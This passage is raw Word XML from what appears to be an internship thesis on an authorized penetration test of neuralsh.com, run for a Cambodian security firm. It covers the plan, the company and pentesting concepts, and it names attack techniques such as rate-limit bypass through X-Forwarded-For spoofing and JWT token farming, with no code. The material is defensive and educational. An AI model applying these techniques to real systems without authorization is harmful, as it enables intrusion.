            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8210"/>
            <w:gridSpan w:val="9"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Vulnerability Assessment &amp; Manual Testing</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Test authentication and rate limiting controls</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Analyze JWT token issuance and session management</w:t>
            </w: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Assess exposed admin panels (WHM, cPanel, MikroTik, MySQL)</w:t>
            </w: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Assign CVSS v3.1 scores to all identified findings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5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8210"/>
            <w:gridSpan w:val="9"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Exploitation &amp; Post-Exploitation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Rate limit bypass via X-Forwarded-For header spoofing</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JWT token farming — 50 tokens, 0 rate-limit responses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Attack chain mapping and lateral movement risk analysis</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D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8210"/>
            <w:gridSpan w:val="9"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Report Writing &amp; Thesis Documentation</w:t>
            </w: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professional VAPT report with all findings and evidence</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Design attack chain diagrams and infrastructure map</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r>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="397"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3402"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Write thesis document and prepare for submission</w:t>
            </w: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ffffff"/>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c>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="601"/>
            <w:shd w:val="clear" w:color="auto" w:fill="70AD47"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Table 3: Action plan from April to May</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>7. Organization Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Prestige Alliance Co., Ltd.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> is an information technology and cybersecurity solutions company operating in Cambodia. The company provides a range of services including network infrastructure design, system integration, software development, and cybersecurity consulting — supporting both private sector clients and government-linked organizations across the country.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="2880000" cy="1018667"/>
            <wp:docPr id="1" name="Picture 1"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="prestige_logo.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2880000" cy="1018667"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Figure 1: Prestige Alliance company logo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Prestige Alliance is committed to helping organizations in the region build and maintain secure, reliable digital systems. With a team of experienced engineers and security practitioners, the company bridges the gap between technical security expertise and business-level risk management — making professional security services accessible to organizations that might otherwise lack the internal capacity to address cyber threats effectively.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>As a cybersecurity-oriented firm, Prestige Alliance recognizes the importance of developing the next generation of security talent. This internship was conducted under the company's technical team, providing a structured environment for hands-on penetration testing work on an authorized real-world target.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5400000" cy="3089350"/>
            <wp:docPr id="2" name="Picture 2"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="PrestigeAlliance_OrgChart.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400000" cy="3089350"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Figure 2: Prestige Alliance organisational structure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5400000" cy="2418663"/>
            <wp:docPr id="3" name="Picture 3"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="map.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400000" cy="2418663"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Figure 3: Prestige Alliance office location</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Email:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> info@prestigealliance.co</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Website:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> https://www.prestigealliance.co/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Telephone:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> +855-88-288-2289</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Address:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> #29A 29B, Street 112, Khan Tuol Kork, Phnom Penh, Cambodia</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>CHAPTER 2: CONCEPTS OF PENETRATION TESTING</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>This chapter establishes the theoretical and practical foundation for the penetration testing work carried out in this internship. It covers what penetration testing is and why it matters, how practical skills were built using platforms such as Hack The Box, the structured process followed during an engagement, and the key industry frameworks and vulnerability classification systems that guided this work.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>1. Introduction to Penetration Testing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Penetration testing, commonly referred to as "pentesting," is the practice of simulating a real-world cyberattack against a system, application, or network with explicit authorization from the owner. Unlike passive security audits that rely on configuration reviews and interviews, penetration testing produces tangible evidence of what an attacker could actually do — which vulnerabilities can be exploited, how far an attacker can move once inside, and what the realistic business impact would be.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The discipline draws a clear line between authorized security testing and unauthorized computer access. A penetration tester operates under a defined scope and rules of engagement, documenting every step in a way that allows the organization to reproduce, verify, and remediate the findings. This makes penetration testing one of the most direct and credible inputs to an organization's risk management process.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Modern penetration testing spans several domains: web application testing, network testing, cloud infrastructure testing, physical security, and social engineering. This internship focused on </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>external web application and infrastructure penetration testing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> — the domain most directly relevant to organizations that expose services to the public internet.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>2. Learning Penetration Testing via Hack The Box</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="2880000" cy="556875"/>
            <wp:docPr id="4" name="Picture 4"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="htb_logo_fixed.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2880000" cy="556875"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Figure 4: Hack The Box platform logo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Practical penetration testing skills cannot be developed from theory alone. Before engaging real-world targets, testers must build hands-on experience in controlled environments. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Hack The Box (HTB)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> is one of the most widely recognized platforms for this purpose. It provides a constantly updated library of deliberately vulnerable machines, web applications, and challenge scenarios that simulate real vulnerabilities found in production environments.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>HTB offers two certification pathways that were directly relevant to this internship:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>2.1 Certified Penetration Testing Specialist (CPTS)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="2880000" cy="2880000"/>
            <wp:docPr id="5" name="Picture 5"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="cpts_logo.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>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5: HTB Certified Penetration Testing Specialist (CPTS)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Penetration Testing Specialist (CPTS)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> pathway covers the full penetration testing engagement lifecycle — from information gathering and reconnaissance through network enumeration, web application attacks, privilege escalation, Active Directory exploitation, and professional reporting. The curriculum is structured around real-world methodology rather than abstract theory, covering every phase of the PTES framework applied in this internship.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Skills developed through CPTS — including DNS enumeration, port scanning interpretation, service fingerprinting, and authentication bypass — were applied directly during the neuralsh.com engagement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>2.2 Certified Web Exploitation Specialist (CWES)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="2880000" cy="2880000"/>
            <wp:docPr id="6" name="Picture 6"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="cwes_logo.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>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6: HTB Certified Web Exploitation Specialist (CWES)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Certified Web Exploitation Specialist (CWES)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> is an HTB certification focused specifically on web application security and exploitation. It covers the full OWASP Top 10 attack categories in depth, including broken access control, authentication failures, injection vulnerabilities, insecure design, and API security testing — all of which appeared as findings in this engagement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>CWES is particularly relevant to the neuralsh.com assessment because the target is a web application with an API-driven architecture. Skills from the CWES pathway — including JWT analysis, rate-limiting bypass techniques, API endpoint enumeration via JavaScript bundle inspection, and authentication flow exploitation — directly informed the discovery and exploitation of findings N-005 (Rate Limit Bypass) and N-007 (JWT Token Farming), both of which were confirmed exploited during this engagement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>3. The Penetration Testing Process</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">This internship followed the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Penetration Testing Execution Standard (PTES)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> — a six-phase lifecycle that structures the engagement from initial information gathering through final reporting. Unlike an ad-hoc approach where tools are run without direction, PTES ensures that every phase produces evidence that feeds the next, and that nothing is tested without a defined reason. The six phases applied in this engagement are described below.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5400000" cy="3602436"/>
            <wp:docPr id="7" name="Picture 7"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="pentest_process.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
